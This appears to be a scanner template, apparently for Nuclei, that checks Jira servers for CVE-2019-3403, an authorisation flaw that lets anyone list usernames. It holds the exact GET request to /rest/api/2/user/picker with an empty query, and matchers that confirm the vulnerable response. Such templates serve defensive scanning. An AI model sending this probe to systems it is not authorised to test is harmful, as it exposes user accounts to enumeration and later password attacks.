38 lines
1014 B
YAML
38 lines
1014 B
YAML
id: CVE-2019-3403
|
|
|
|
info:
|
|
name: User enumeration via an incorrect authorisation check
|
|
author: Ganofins
|
|
severity: medium
|
|
description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
|
|
reference: https://jira.atlassian.com/browse/JRASERVER-69242
|
|
tags: cve,cve2019,atlassian,jira
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.30
|
|
cve-id: CVE-2019-3403
|
|
cwe-id: CWE-863
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/rest/api/2/user/picker?query="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'application/json'
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- users
|
|
- total
|
|
- header
|
|
condition: and |